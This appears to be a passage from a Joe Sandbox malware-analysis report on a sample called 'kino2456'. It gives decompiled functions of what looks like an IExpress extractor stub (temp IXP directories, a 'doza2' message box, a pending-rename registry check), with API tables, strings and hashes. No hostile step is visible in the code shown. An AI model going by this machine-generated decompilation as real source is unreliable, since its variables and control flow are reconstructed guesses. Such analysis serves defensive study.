				signed int _t44;
				signed int _t49;
				signed int _t52;
				void* _t54;
				intOrPtr _t55;
				intOrPtr _t58;
				intOrPtr _t59;
				int _t64;
				void* _t66;
				intOrPtr* _t67;
				signed int _t69;
				intOrPtr* _t73;
				intOrPtr* _t76;
				intOrPtr* _t77;
				void* _t80;
				void* _t81;
				void* _t82;
				intOrPtr* _t84;
				void* _t85;
				signed int _t89;

				_t75 = __edx;
				_t34 =  *0xfc8004; // 0xd6d6fca6
				_v8 = _t34 ^ _t89;
				_v584 = __ecx;
				_t83 = "LoadString() Error.  Could not load string resource.";
				_t67 = _a4;
				_t69 = 0xd;
				_t37 = memcpy( &_v64, _t83, _t69 << 2);
				_t80 = _t83 + _t69 + _t69;
				_v580 = _t37;
				asm("movsb");
				if(( *0xfc8a38 & 0x00000001) != 0) {
					_t39 = 1;
				} else {
					_v576 = 0;
					LoadStringA( *0xfc9a3c, _t75,  &_v576, 0x200);
					if(_v576 != 0) {
						_t73 =  &_v576;
						_t16 = _t73 + 1; // 0x1
						_t75 = _t16;
						do {
							_t43 =  *_t73;
							_t73 = _t73 + 1;
						} while (_t43 != 0);
						_t84 = _v580;
						_t74 = _t73 - _t75;
						if(_t84 == 0) {
							if(_t67 == 0) {
								_t27 = _t74 + 1; // 0x2
								_t83 = _t27;
								_t44 = LocalAlloc(0x40, _t83);
								_t80 = _t44;
								if(_t80 == 0) {
									goto L6;
								} else {
									_t75 = _t83;
									_t74 = _t80;
									E00FC1680(_t80, _t83,  &_v576);
									goto L23;
								}
							} else {
								_t76 = _t67;
								_t24 = _t76 + 1; // 0x1
								_t85 = _t24;
								do {
									_t55 =  *_t76;
									_t76 = _t76 + 1;
								} while (_t55 != 0);
								_t25 = _t76 - _t85 + 0x64; // 0x65
								_t83 = _t25 + _t74;
								_t44 = LocalAlloc(0x40, _t25 + _t74);
								_t80 = _t44;
								if(_t80 == 0) {
									goto L6;
								} else {
									E00FC171E(_t80, _t83,  &_v576, _t67);
									goto L23;
								}
							}
						} else {
							_t77 = _t67;
							_t18 = _t77 + 1; // 0x1
							_t81 = _t18;
							do {
								_t58 =  *_t77;
								_t77 = _t77 + 1;
							} while (_t58 != 0);
							_t75 = _t77 - _t81;
							_t82 = _t84 + 1;
							do {
								_t59 =  *_t84;
								_t84 = _t84 + 1;
							} while (_t59 != 0);
							_t21 = _t74 + 0x64; // 0x65
							_t83 = _t21 + _t84 - _t82 + _t75;
							_t44 = LocalAlloc(0x40, _t21 + _t84 - _t82 + _t75);
							_t80 = _t44;
							if(_t80 == 0) {
								goto L6;
							} else {
								_push(_v580);
								E00FC171E(_t80, _t83,  &_v576, _t67);
								L23:
								MessageBeep(_a12);
								if(E00FC681F(_t67) == 0) {
									L25:
									_t49 = 0x10000;
								} else {
									_t54 = E00FC67C9(_t74, _t74);
									_t49 = 0x190000;
									if(_t54 == 0) {
										goto L25;
									}
								}
								_t52 = MessageBoxA(_v584, _t80, "doza2", _t49 | _a12 | _a16); // executed
								_t83 = _t52;
								LocalFree(_t80);
								_t39 = _t52;
							}
						}
					} else {
						if(E00FC681F(_t67) == 0) {
							L4:
							_t64 = 0x10010;
						} else {
							_t66 = E00FC67C9(0, 0);
							_t64 = 0x190010;
							if(_t66 == 0) {
								goto L4;
							}
						}
						_t44 = MessageBoxA(_v584,  &_v64, "doza2", _t64);
						L6:
						_t39 = _t44 | 0xffffffff;
					}
				}
				return E00FC6CE0(_t39, _t67, _v8 ^ _t89, _t75, _t80, _t83);
			}

0x00fc44b9
0x00fc44c4
0x00fc44cb
0x00fc44d8
0x00fc44e4
0x00fc44eb
0x00fc44ee
0x00fc44ef
0x00fc44ef
0x00fc44f1
0x00fc44f7
0x00fc44f8
0x00fc467b
0x00fc44fe
0x00fc4509
0x00fc4518
0x00fc4525
0x00fc4562
0x00fc4568
0x00fc4568
0x00fc456b
0x00fc456b
0x00fc456d
0x00fc456e
0x00fc4572
0x00fc4578
0x00fc457c
0x00fc45cb
0x00fc4607
0x00fc4607
0x00fc460d
0x00fc4613
0x00fc4617
0x00000000
0x00fc461d
0x00fc4623
0x00fc4626
0x00fc4628
0x00000000
0x00fc4628
0x00fc45cd
0x00fc45cd
0x00fc45cf
0x00fc45cf
0x00fc45d2
0x00fc45d2
0x00fc45d4
0x00fc45d5
0x00fc45db
0x00fc45de
0x00fc45e3
0x00fc45e9
0x00fc45ed
0x00000000
0x00fc45f3
0x00fc45fd
0x00000000
0x00fc4602
0x00fc45ed
0x00fc457e
0x00fc457e
0x00fc4580
0x00fc4580
0x00fc4583
0x00fc4583
0x00fc4585
0x00fc4586
0x00fc458a
0x00fc458c
0x00fc458f
0x00fc458f
0x00fc4591
0x00fc4592
0x00fc459b
0x00fc459e
0x00fc45a3
0x00fc45a9
0x00fc45ad
0x00000000
0x00fc45af
0x00fc45af
0x00fc45bf
0x00fc462d
0x00fc4630
0x00fc463d
0x00fc464e
0x00fc464e
0x00fc463f
0x00fc4640
0x00fc4647
0x00fc464c
0x00000000
0x00000000
0x00fc464c
0x00fc4666
0x00fc466d
0x00fc466f
0x00fc4675
0x00fc4675
0x00fc45ad
0x00fc4527
0x00fc452e
0x00fc453f
0x00fc453f
0x00fc4530
0x00fc4531
0x00fc4538
0x00fc453d
0x00000000
0x00000000
0x00fc453d
0x00fc4554
0x00fc455a
0x00fc455a
0x00fc455a
0x00fc4525
0x00fc468c

APIs

LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00FC4518
MessageBoxA.USER32(?,?,doza2,00010010), ref: 00FC4554
LocalAlloc.KERNEL32(00000040,00000065), ref: 00FC45A3
LocalAlloc.KERNEL32(00000040,00000065), ref: 00FC45E3
LocalAlloc.KERNEL32(00000040,00000002), ref: 00FC460D
MessageBeep.USER32(00000000), ref: 00FC4630
MessageBoxA.USER32(?,00000000,doza2,00000000), ref: 00FC4666
LocalFree.KERNEL32(00000000), ref: 00FC466F

Part of subcall function 00FC681F: GetVersionExA.KERNEL32(?,00000000,00000002), ref: 00FC686E
Part of subcall function 00FC681F: GetSystemMetrics.USER32(0000004A), ref: 00FC68A7
Part of subcall function 00FC681F: RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 00FC68CC
Part of subcall function 00FC681F: RegQueryValueExA.ADVAPI32(?,00FC1140,00000000,?,?,0000000C), ref: 00FC68F4
Part of subcall function 00FC681F: RegCloseKey.ADVAPI32(?), ref: 00FC6902

Strings

doza2, xrefs: 00FC4545, 00FC465A
LoadString() Error. Could not load string resource., xrefs: 00FC44E4

Memory Dump Source

Source File: 00000002.00000002.376994529.0000000000FC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000002.00000002.376989683.0000000000FC0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.377010747.0000000000FC8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.377016593.0000000000FCA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.377016593.0000000000FCC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_fc0000_kino2456.jbxd

Similarity

API ID: Local$AllocMessage$BeepCloseFreeLoadMetricsOpenQueryStringSystemValueVersion
String ID: LoadString() Error. Could not load string resource.$doza2
API String ID: 3244514340-3130468218
Opcode ID: 5e99121f202ff482c5afc338f6c58ceca99f7501b06228bd97d0476c68c51ce4
Instruction ID: f5c1c8612150abe30ffc154b698165042f316bb64c2a0241961189b3983dfb67
Opcode Fuzzy Hash: 5e99121f202ff482c5afc338f6c58ceca99f7501b06228bd97d0476c68c51ce4
Instruction Fuzzy Hash: F3512572D0011AAFDB219F28CE5AFAABB68EF45314F184598FC19A3241DB35ED05FB50

Uniqueness

Uniqueness Score: -1.00%

Function 00FC53A1 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 71
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 95%

			E00FC53A1(CHAR* __ecx, CHAR* __edx) {
				signed int _v8;
				char _v268;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t5;
				long _t13;
				int _t14;
				CHAR* _t20;
				int _t29;
				int _t30;
				CHAR* _t32;
				signed int _t33;
				void* _t34;

				_t5 =  *0xfc8004; // 0xd6d6fca6
				_v8 = _t5 ^ _t33;
				_t32 = __edx;
				_t20 = __ecx;
				_t29 = 0;
				while(1) {
					E00FC171E( &_v268, 0x104, "IXP%03d.TMP", _t29);
					_t34 = _t34 + 0x10;
					_t29 = _t29 + 1;
					E00FC1680(_t32, 0x104, _t20);
					E00FC658A(_t32, 0x104,  &_v268); // executed
					RemoveDirectoryA(_t32); // executed
					_t13 = GetFileAttributesA(_t32); // executed
					if(_t13 == 0xffffffff) {
						break;
					}
					if(_t29 < 0x190) {
						continue;
					}
					L3:
					_t30 = 0;
					if(GetTempFileNameA(_t20, "IXP", 0, _t32) != 0) {
						_t30 = 1;
						DeleteFileA(_t32);
						CreateDirectoryA(_t32, 0);
					}
					L5:
					return E00FC6CE0(_t30, _t20, _v8 ^ _t33, 0x104, _t30, _t32);
				}
				_t14 = CreateDirectoryA(_t32, 0); // executed
				if(_t14 == 0) {
					goto L3;
				}
				_t30 = 1;
				 *0xfc8a20 = 1;
				goto L5;
			}

0x00fc53ac
0x00fc53b3
0x00fc53b9
0x00fc53bb
0x00fc53bd
0x00fc53bf
0x00fc53d1
0x00fc53d6
0x00fc53e0
0x00fc53e2
0x00fc53f5
0x00fc53fb
0x00fc5402
0x00fc540b
0x00000000
0x00000000
0x00fc5413
0x00000000
0x00000000
0x00fc5415
0x00fc5416
0x00fc5427
0x00fc542a
0x00fc542b
0x00fc5434
0x00fc5434
0x00fc543a
0x00fc544c
0x00fc544c
0x00fc5452
0x00fc545a
0x00000000
0x00000000
0x00fc545e
0x00fc545f
0x00000000

APIs

Part of subcall function 00FC171E: _vsnprintf.MSVCRT ref: 00FC1750

RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00FC53FB
GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00FC5402
GetTempFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP002.TMP\,IXP,00000000,?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00FC541F
DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00FC542B
CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00FC5434
CreateDirectoryA.KERNELBASE(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00FC5452

Strings

IXP%03d.TMP, xrefs: 00FC53C0
C:\Users\user\AppData\Local\Temp\IXP002.TMP\, xrefs: 00FC53B7, 00FC53E1, 00FC541E
IXP, xrefs: 00FC5419

Memory Dump Source

Source File: 00000002.00000002.376994529.0000000000FC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000002.00000002.376989683.0000000000FC0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.377010747.0000000000FC8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.377016593.0000000000FCA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.377016593.0000000000FCC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_fc0000_kino2456.jbxd

Similarity

API ID: DirectoryFile$Create$AttributesDeleteNameRemoveTemp_vsnprintf
String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\$IXP$IXP%03d.TMP
API String ID: 1082909758-7194216
Opcode ID: 85fa43d595e7ea5c24ca7f514320d8a52c754ec063e1384f0a87eb53ddeceeae
Instruction ID: 7bc5bc82953392408f8108c000ac672046761814dce066e7a98022074e4415e3
Opcode Fuzzy Hash: 85fa43d595e7ea5c24ca7f514320d8a52c754ec063e1384f0a87eb53ddeceeae
Instruction Fuzzy Hash: BF11347174050867E3209B229E0BFAF366DEFC2765F00002DF546D3190CE789986A6A2

Uniqueness

Uniqueness Score: -1.00%

Function 00FC5467 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 101
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 75%

			E00FC5467(CHAR* __ecx, void* __edx, char* _a4) {
				signed int _v8;
				char _v268;
				struct _SYSTEM_INFO _v304;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t10;
				void* _t13;
				intOrPtr _t14;
				void* _t16;
				void* _t20;
				signed int _t26;
				void* _t28;
				void* _t29;
				CHAR* _t48;
				signed int _t49;
				intOrPtr _t61;

				_t10 =  *0xfc8004; // 0xd6d6fca6
				_v8 = _t10 ^ _t49;
				_push(__ecx);
				if(__edx == 0) {
					_t48 = 0xfc91e4;
					_t42 = 0x104;
					E00FC1680(0xfc91e4, 0x104);
					L14:
					_t13 = E00FC58C8(_t48); // executed
					if(_t13 != 0) {
						L17:
						_t42 = _a4;
						if(_a4 == 0) {
							L23:
							 *0xfc9124 = 0;
							_t14 = 1;
							L24:
							return E00FC6CE0(_t14, 0, _v8 ^ _t49, _t42, 1, _t48);
						}
						_t16 = E00FC597D(_t48, _t42, 1, 0); // executed
						if(_t16 != 0) {
							goto L23;
						}
						_t61 =  *0xfc8a20; // 0x0
						if(_t61 != 0) {
							 *0xfc8a20 = 0;
							RemoveDirectoryA(_t48);
						}
						L22:
						_t14 = 0;
						goto L24;
					}
					if(CreateDirectoryA(_t48, 0) == 0) {
						 *0xfc9124 = E00FC6285();
						goto L22;
					}
					 *0xfc8a20 = 1;
					goto L17;
				}
				_t42 =  &_v268;
				_t20 = E00FC53A1(__ecx,  &_v268); // executed
				if(_t20 == 0) {
					goto L22;
				}
				_push(__ecx);
				_t48 = 0xfc91e4;
				E00FC1781(0xfc91e4, 0x104, __ecx,  &_v268);
				if(( *0xfc9a34 & 0x00000020) == 0) {
					L12:
					_t42 = 0x104;
					E00FC658A(_t48, 0x104, 0xfc1140);
					goto L14;
				}
				GetSystemInfo( &_v304);
				_t26 = _v304.dwOemId & 0x0000ffff;
				if(_t26 == 0) {
					_push("i386");
					L11:
					E00FC658A(_t48, 0x104);
					goto L12;
				}
				_t28 = _t26 - 1;
				if(_t28 == 0) {
					_push("mips");
					goto L11;
				}
				_t29 = _t28 - 1;
				if(_t29 == 0) {
					_push("alpha");
					goto L11;
				}
				if(_t29 != 1) {
					goto L12;
				}
				_push("ppc");
				goto L11;
			}

0x00fc5472
0x00fc5479
0x00fc5481
0x00fc5484
0x00fc551c
0x00fc5521
0x00fc5528
0x00fc552d
0x00fc552f
0x00fc5539
0x00fc554d
0x00fc554d
0x00fc5552
0x00fc5585
0x00fc5585
0x00fc558b
0x00fc558d
0x00fc559d
0x00fc559d
0x00fc5557
0x00fc555e
0x00000000
0x00000000
0x00fc5560
0x00fc5566
0x00fc5569
0x00fc556f
0x00fc556f
0x00fc5581
0x00fc5581
0x00000000
0x00fc5581
0x00fc5545
0x00fc557c
0x00000000
0x00fc557c
0x00fc5547
0x00000000
0x00fc5547
0x00fc548a
0x00fc5490
0x00fc5497
0x00000000
0x00000000
0x00fc549d
0x00fc54ab
0x00fc54b4
0x00fc54c0
0x00fc550c
0x00fc5511
0x00fc5515
0x00000000
0x00fc5515
0x00fc54c9
0x00fc54d6
0x00fc54d8
0x00fc54fe
0x00fc5503
0x00fc5507
0x00000000
0x00fc5507
0x00fc54da
0x00fc54dd
0x00fc54f7
0x00000000
0x00fc54f7
0x00fc54df
0x00fc54e2
0x00fc54f0
0x00000000
0x00fc54f0
0x00fc54e7
0x00000000
0x00000000
0x00fc54e9
0x00000000

APIs

GetSystemInfo.KERNEL32(?,?,?,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00FC54C9
CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00FC553D
RemoveDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00FC556F

Part of subcall function 00FC53A1: RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00FC53FB
Part of subcall function 00FC53A1: GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00FC5402
Part of subcall function 00FC53A1: GetTempFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP002.TMP\,IXP,00000000,?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00FC541F
Part of subcall function 00FC53A1: DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00FC542B
Part of subcall function 00FC53A1: CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00FC5434

Strings

mips, xrefs: 00FC54F7
alpha, xrefs: 00FC54F0
C:\Users\user\AppData\Local\Temp\IXP002.TMP\, xrefs: 00FC547D, 00FC5481, 00FC54AB, 00FC551C, 00FC553C, 00FC5568
ppc, xrefs: 00FC54E9
i386, xrefs: 00FC54FE

Memory Dump Source

Source File: 00000002.00000002.376994529.0000000000FC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000002.00000002.376989683.0000000000FC0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.377010747.0000000000FC8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.377016593.0000000000FCA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.377016593.0000000000FCC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_fc0000_kino2456.jbxd

Similarity

API ID: Directory$File$CreateRemove$AttributesDeleteInfoNameSystemTemp
String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\$alpha$i386$mips$ppc
API String ID: 1979080616-3696344869
Opcode ID: b7252e8f46265259f40d0fe5f2d99365d49c954f77caab7de7e3e9be78e406a0
Instruction ID: 16a3e707fb5115f5bffeb020810de0fc6e4d193775758022fee2dd0883388e2d
Opcode Fuzzy Hash: b7252e8f46265259f40d0fe5f2d99365d49c954f77caab7de7e3e9be78e406a0
Instruction Fuzzy Hash: AD314C71F00A0B5BCB109B259F47F7E779BBB81B58B0C052EA401D3141DB78EE89B681

Uniqueness

Uniqueness Score: -1.00%

Function 00FC256D Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 75
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 86%

			E00FC256D(signed int __ecx) {
				int _v8;
				void* _v12;
				signed int _t13;
				signed int _t19;
				long _t24;
				void* _t26;
				int _t31;
				void* _t34;

				_push(__ecx);
				_push(__ecx);
				_t13 = __ecx & 0x0000ffff;
				_t31 = 0;
				if(_t13 == 0) {
					_t31 = E00FC24E0(_t26);
				} else {
					_t34 = _t13 - 1;
					if(_t34 == 0) {
						_v8 = 0;
						if(RegOpenKeyExA(0x80000002, "System\\CurrentControlSet\\Control\\Session Manager\\FileRenameOperations", 0, 0x20019,  &_v12) != 0) {
							goto L7;
						} else {
							_t19 = RegQueryInfoKeyA(_v12, 0, 0, 0, 0, 0, 0,  &_v8, 0, 0, 0, 0);
							goto L6;
						}
						L12:
					} else {
						if(_t34 > 0 && __ecx <= 3) {
							_v8 = 0;
							_t24 = RegOpenKeyExA(0x80000002, "System\\CurrentControlSet\\Control\\Session Manager", 0, 0x20019,  &_v12); // executed
							if(_t24 == 0) {
								_t19 = RegQueryValueExA(_v12, "PendingFileRenameOperations", 0, 0, 0,  &_v8); // executed
								L6:
								asm("sbb eax, eax");
								_v8 = _v8 &  !( ~_t19);
								RegCloseKey(_v12); // executed
							}
							L7:
							_t31 = _v8;
						}
					}
				}
				return _t31;
				goto L12;
			}

0x00fc2572
0x00fc2573
0x00fc2575
0x00fc2578
0x00fc257d
0x00fc2627
0x00fc2583
0x00fc2586
0x00fc2589
0x00fc25eb
0x00fc2607
0x00000000
0x00fc2609
0x00fc261a
0x00000000
0x00fc261a
0x00000000
0x00fc258b
0x00fc258b
0x00fc259e
0x00fc25b2
0x00fc25ba
0x00fc25cb
0x00fc25d1
0x00fc25d6
0x00fc25da
0x00fc25dd
0x00fc25dd
0x00fc25e3
0x00fc25e3
0x00fc25e3
0x00fc258b
0x00fc2589
0x00fc262f
0x00000000

APIs

RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Control\Session Manager,00000000,00020019,?,00000000,00FC4096,00FC4096,?,00FC1ED3,00000001,00000000,?,?,00FC4137,?), ref: 00FC25B2
RegQueryValueExA.KERNELBASE(?,PendingFileRenameOperations,00000000,00000000,00000000,00FC4096,?,00FC1ED3,00000001,00000000,?,?,00FC4137,?,00FC4096), ref: 00FC25CB
RegCloseKey.KERNELBASE(?,?,00FC1ED3,00000001,00000000,?,?,00FC4137,?,00FC4096), ref: 00FC25DD
RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Session Manager\FileRenameOperations,00000000,00020019,?,00000000,00FC4096,00FC4096,?,00FC1ED3,00000001,00000000,?,?,00FC4137,?), ref: 00FC25FF
RegQueryInfoKeyA.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000,00000000,00FC4096,00000000,00000000,00000000,00000000,?,00FC1ED3,00000001,00000000), ref: 00FC261A

Strings

PendingFileRenameOperations, xrefs: 00FC25C3
System\CurrentControlSet\Control\Session Manager, xrefs: 00FC25A8
System\CurrentControlSet\Control\Session Manager\FileRenameOperations, xrefs: 00FC25F5

Memory Dump Source

Source File: 00000002.00000002.376994529.0000000000FC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000002.00000002.376989683.0000000000FC0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.377010747.0000000000FC8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.377016593.0000000000FCA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.377016593.0000000000FCC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_fc0000_kino2456.jbxd

Similarity

API ID: OpenQuery$CloseInfoValue
String ID: PendingFileRenameOperations$System\CurrentControlSet\Control\Session Manager$System\CurrentControlSet\Control\Session Manager\FileRenameOperations
API String ID: 2209512893-559176071
Opcode ID: fb58d7d7a45f7bbf56f57f2741ae127c59093e37bab376f0514ee1ea597dd169
Instruction ID: b490d50f914c8e3938850340bd210eb62913da02f3ac026263eeba7dcbe1503f
Opcode Fuzzy Hash: fb58d7d7a45f7bbf56f57f2741ae127c59093e37bab376f0514ee1ea597dd169
Instruction Fuzzy Hash: 7711603594222DBB9B20DB919E0FEFBBE6CEB417A5F144059B809A2000DB309A45F6A1

Uniqueness

Uniqueness Score: -1.00%

Function 00FC6A60 Relevance: 13.6, APIs: 9, Instructions: 138
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 51%

			_entry_(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int* _t25;
				signed int _t26;
				signed int _t29;
				int _t30;
				signed int _t37;
				signed char _t41;
				signed int _t53;
				signed int _t54;
				intOrPtr _t56;
				signed int _t58;
				signed int _t59;
				intOrPtr* _t60;
				void* _t62;
				void* _t67;
				void* _t68;

				E00FC7155();
				_push(0x58);
				_push(0xfc72b8);
				E00FC7208(__ebx, __edi, __esi);
				 *(_t62 - 0x20) = 0;
				GetStartupInfoW(_t62 - 0x68);
				 *((intOrPtr*)(_t62 - 4)) = 0;
				_t56 =  *((intOrPtr*)( *[fs:0x18] + 4));
				_t53 = 0;
				while(1) {
					asm("lock cmpxchg [edx], ecx");
					if(0 == 0) {
						break;
					}
					if(0 != _t56) {
						Sleep(0x3e8);
						continue;
					} else {
						_t58 = 1;
						_t53 = 1;
					}
					L7:
					_t67 =  *0xfc88b0 - _t58; // 0x2
					if(_t67 != 0) {
						__eflags =  *0xfc88b0; // 0x2
						if(__eflags != 0) {
							 *0xfc81e4 = _t58;
							goto L13;
						} else {
							 *0xfc88b0 = _t58;
							_t37 = E00FC6C3F(0xfc10b8, 0xfc10c4); // executed
							__eflags = _t37;
							if(__eflags == 0) {
								goto L13;
							} else {
								 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
								_t30 = 0xff;
							}
						}
					} else {
						_push(0x1f);
						L00FC6FF4();
						L13:
						_t68 =  *0xfc88b0 - _t58; // 0x2
						if(_t68 == 0) {
							_push(0xfc10b4);
							_push(0xfc10ac);
							L00FC7202();
							 *0xfc88b0 = 2;
						}
						if(_t53 == 0) {
							 *0xfc88ac = 0;
						}
						_t71 =  *0xfc88b4;
						if( *0xfc88b4 != 0 && E00FC7060(_t71, 0xfc88b4) != 0) {
							_t60 =  *0xfc88b4; // 0x0
							 *0xfca288(0, 2, 0);
							 *_t60();
						}
						_t25 = __imp___acmdln; // 0x76235b9c
						_t59 =  *_t25;
						 *(_t62 - 0x1c) = _t59;
						_t54 =  *(_t62 - 0x20);
						while(1) {
							_t41 =  *_t59;
							if(_t41 > 0x20) {
								goto L32;
							}
							if(_t41 != 0) {
								if(_t54 != 0) {
									goto L32;
								} else {
									while(_t41 != 0 && _t41 <= 0x20) {
										_t59 = _t59 + 1;
										 *(_t62 - 0x1c) = _t59;
										_t41 =  *_t59;
									}
								}
							}
							__eflags =  *(_t62 - 0x3c) & 0x00000001;
							if(( *(_t62 - 0x3c) & 0x00000001) == 0) {
								_t29 = 0xa;
							} else {
								_t29 =  *(_t62 - 0x38) & 0x0000ffff;
							}
							_push(_t29);
							_t30 = E00FC2BFB(0xfc0000, 0, _t59); // executed
							 *0xfc81e0 = _t30;
							__eflags =  *0xfc81f8;
							if( *0xfc81f8 == 0) {
								exit(_t30); // executed
								goto L32;
							}
							__eflags =  *0xfc81e4;
							if( *0xfc81e4 == 0) {
								__imp___cexit();
								_t30 =  *0xfc81e0; // 0x80070002
							}
							 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
							goto L40;
							L32:
							__eflags = _t41 - 0x22;
							if(_t41 == 0x22) {
								__eflags = _t54;
								_t15 = _t54 == 0;
								__eflags = _t15;
								_t54 = 0 | _t15;
								 *(_t62 - 0x20) = _t54;
							}
							_t26 = _t41 & 0x000000ff;
							__imp___ismbblead(_t26);
							__eflags = _t26;
							if(_t26 != 0) {
								_t59 = _t59 + 1;
								__eflags = _t59;
								 *(_t62 - 0x1c) = _t59;
							}
							_t59 = _t59 + 1;
							 *(_t62 - 0x1c) = _t59;
						}
					}
					L40:
					return E00FC724D(_t30);
				}
				_t58 = 1;
				__eflags = 1;
				goto L7;
			}

0x00fc6a60
0x00fc6a6a
0x00fc6a6c
0x00fc6a71
0x00fc6a78
0x00fc6a7f
0x00fc6a85
0x00fc6a8e
0x00fc6a91
0x00fc6a93
0x00fc6a9c
0x00fc6aa2
0x00000000
0x00000000
0x00fc6aa6
0x00fc6ab4
0x00000000
0x00fc6aa8
0x00fc6aaa
0x00fc6aab
0x00fc6aab
0x00fc6abf
0x00fc6abf
0x00fc6ac5
0x00fc6ad1
0x00fc6ad7
0x00fc6b05
0x00000000
0x00fc6ad9
0x00fc6ad9
0x00fc6ae9
0x00fc6af0
0x00fc6af2
0x00000000
0x00fc6af4
0x00fc6af4
0x00fc6afb
0x00fc6afb
0x00fc6af2
0x00fc6ac7
0x00fc6ac7
0x00fc6ac9
0x00fc6b0b
0x00fc6b0b
0x00fc6b11
0x00fc6b13
0x00fc6b18
0x00fc6b1d
0x00fc6b24
0x00fc6b24
0x00fc6b30
0x00fc6b39
0x00fc6b39
0x00fc6b3b
0x00fc6b42
0x00fc6b57
0x00fc6b5f
0x00fc6b65
0x00fc6b65
0x00fc6b67
0x00fc6b6c
0x00fc6b6e
0x00fc6b71
0x00fc6b74
0x00fc6b74
0x00fc6b79
0x00000000
0x00000000
0x00fc6b7d
0x00fc6b81
0x00000000
0x00000000
0x00fc6b83
0x00fc6b8c
0x00fc6b8d
0x00fc6b90
0x00fc6b90
0x00fc6b83
0x00fc6b81
0x00fc6b94
0x00fc6b98
0x00fc6ba2
0x00fc6b9a
0x00fc6b9a
0x00fc6b9a
0x00fc6ba3
0x00fc6bab
0x00fc6bb0
0x00fc6bb5
0x00fc6bbc
0x00fc6bbf
0x00000000
0x00fc6bbf
0x00fc6c1e
0x00fc6c25
0x00fc6c27
0x00fc6c2d
0x00fc6c2d
0x00fc6c32
0x00000000
0x00fc6bc5
0x00fc6bc5
0x00fc6bc8
0x00fc6bcc
0x00fc6bce
0x00fc6bce
0x00fc6bd1
0x00fc6bd3
